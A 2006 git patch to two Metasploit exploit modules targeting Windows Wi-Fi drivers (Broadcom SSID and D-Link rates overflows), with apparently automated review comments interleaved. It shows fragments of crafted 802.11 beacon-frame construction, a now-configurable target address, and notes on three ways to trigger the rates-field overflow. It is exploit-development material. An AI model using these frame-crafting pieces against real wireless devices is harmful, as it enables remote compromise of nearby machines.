From 5c0176e2dd4036568b6d426bc527588c7d27b486 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 15 Nov 2006 21:23:03 +0000
Subject: [PATCH] Better credit to Gil in the comments, made ADDR_DST do something
git-svn-id: file:///home/svn/framework3/trunk@4141 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/driver/broadcom_wifi_ssid.rb | 2 +-
 modules/exploits/windows/driver/dlink_wifi_rates.rb | 9 ++++++---
 2 files changed, 7 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb
index 68e33d5a63..a203883c1f 100644
--- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb
+++ b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb
@@ -153,7 +153,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
 "\x80" + # type/subtype
 "\x00" + # flags
 "\x00\x00" + # duration
-"\xff\xff\xff\xff\xff\xff" + # dst
+eton(datastore['ADDR_DST']) + # dst
 "\x58\x58\x58\x58\x58\x58" + # src
 "\x58\x58\x58\x58\x58\x58" + # bssid
 "\x70\xed" + # sequence number
diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb
index 1f3cb1fccc..5d46f3f706 100644
--- a/modules/exploits/windows/driver/dlink_wifi_rates.rb
+++ b/modules/exploits/windows/driver/dlink_wifi_rates.rb
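Review bot: `eton(datastore['ADDR_DST'])` on the new `# dst` line is concatenated into the frame with no check on the length of what it returns, so an ADDR_DST that is unset or not a well-formed six-octet MAC string would silently shift every field that follows instead of failing with a clear message; the dlink hunk at -158 has the same pattern. The option's registration and the `eton` helper are outside this hunk, so whether a broadcast default or format validation already exists cannot be confirmed from the diff (presumably `eton` turns a colon-separated MAC string into six raw bytes). A guard before the frame is assembled, `dst = eton(datastore['ADDR_DST'])` followed by `raise ArgumentError, "ADDR_DST must be a six-octet MAC address" unless dst.length == 6`, would surface a bad option value at the point it is read, and widening the trailing comment to `# dst (ADDR_DST option; was fixed broadcast ff:ff:ff:ff:ff:ff)` records why the literal went away. The method that builds this frame starts and ends outside the hunk.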
@@ -137,12 +137,15 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
 end
+#
+# The following research was provided by Gil Dabah of ZERT
 #
 # The long rates field bug can be triggered three different ways (at least):
 # 1) Send a single rates IE with valid rates up front and long data
-# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
+# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
 # 3) Send two IE rates fields, with the second one containing the long data (this exploit)
 #
+
 def create_beacon
 ssid = Rex::Text.rand_text_alphanumeric(6)
@@ -158,9 +161,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
 "\x80" + # type/subtype
 "\x00" + # flags
 "\x00\x00" + # duration
-"\xff\xff\xff\xff\xff\xff" + # dst
+eton(datastore['ADDR_DST']) + # dst
 src + # src
-bssid + # bssid
+bssid + # bssid
 seq + # seq
 Rex::Text.rand_text(8) + # timestamp value
 "\x64\x00" + # beacon interval
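Review bot: The `bssid + # bssid` line is removed and re-added with no difference visible once whitespace is collapsed, so it is presumably an indentation or alignment touch riding along in a functional commit; it inflates the diffstat and makes `git blame` on that line point at the ADDR_DST change. Keeping whitespace-only edits in a separate commit, or dropping this one, would reduce the hunk to the single intended change on the `# dst` line. `src`, `bssid` and `seq` are assigned in `create_beacon` above this hunk and the frame expression continues past `# beacon interval`, so the enclosing method starts and ends outside it.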